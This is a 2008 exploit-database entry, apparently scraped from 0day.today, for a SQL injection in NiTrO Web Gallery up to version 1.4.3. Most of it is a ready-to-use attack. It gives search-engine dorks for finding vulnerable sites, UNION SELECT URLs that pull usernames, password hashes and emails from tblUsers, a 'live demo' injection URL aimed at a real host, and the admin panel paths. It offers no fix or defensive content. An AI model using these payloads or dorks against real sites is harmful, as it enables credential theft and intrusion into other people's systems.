[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

NiTrO Web Gallery <= 1.4.3 (section) Remote SQL Injection Vulnerability

Author
Mr.SQL
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-3194
Category
web applications
Date add
15-06-2008
Platform
unsorted
=======================================================================
NiTrO Web Gallery <= 1.4.3 (section) Remote SQL Injection Vulnerability
=======================================================================



#########################################################################
#################### Viva IslaM Viva IslaM ##############################
##
## Remote SQL Injection Vulnerability
##
## NiTrO Web Gallery V1.3 - V1.4- V1.41 - 1.42 - V1.43 ( albums.php section )
##
#########################################################################
########################
########################
##
## Script   : NiTrO Web Gallery
##
## Versions : V1.3 - V1.4- V1.41 - V1.42 - V1.43
##
##  Site    : www.nitropowered.net  <<>> Download The Script :   http://www.nitropowered.net/downloads/
##
########################
########################
##
##   D0rk 1 :  allinurl: "albums.php" section cats action show CatId
##
##   D0rk 2 :  "(C) This site is NITROpowered!"
##
##     -(:: SQL ::)-
##
##    www.site.com/
##           albums.php?section=cats&action=show&CatId=-1+union+select+1,concat_ws(0x3a3a,UserName,UserPassword,UserEmail),3,4,5,6,7,8+from+tblUsers/*
##           0r
##           albums.php?section=cats&action=show&CatId=-1+union+select+1,concat_ws(0x3a3a,UserName,UserPassword,UserEmail),3,4,5,6,7,8,9+from+tblUsers/*
##             
##  -(:: L!VE DEMO ::)-
##
##     http://demo.nitropowered.de/albums.php?section=cats&action=show&CatId=-1+union+select+1,concat_ws(0x3a3a,UserName,UserPassword,UserEmail),3,4,5,6,7,8,9+from+tblUsers/*
##
########################
########################
##  -(:: Admin Panel ::)- 
##
##  www.site.com/?admin=1
##  www.site.com/admin/
###################
###################

    -(:: N0Te ::)-
 tblUsers maybe this not admin table  //  (( Passwords => MD5 ))  ;)
 
######################################################################################################
######################################################################################################
 
                                  -(:: !Gr3E3E3E3E3E3E3TzZ! ::)-
 
:: HaCkEr-EGy :: His0k4 :: Dark MaSTer :: MoHaMeD el 3rab :: ALwHeD :: HeBarieH :: MusliMs HaCkErs ::
 
######################################################################################################



#  0day.today [2024-11-15]  #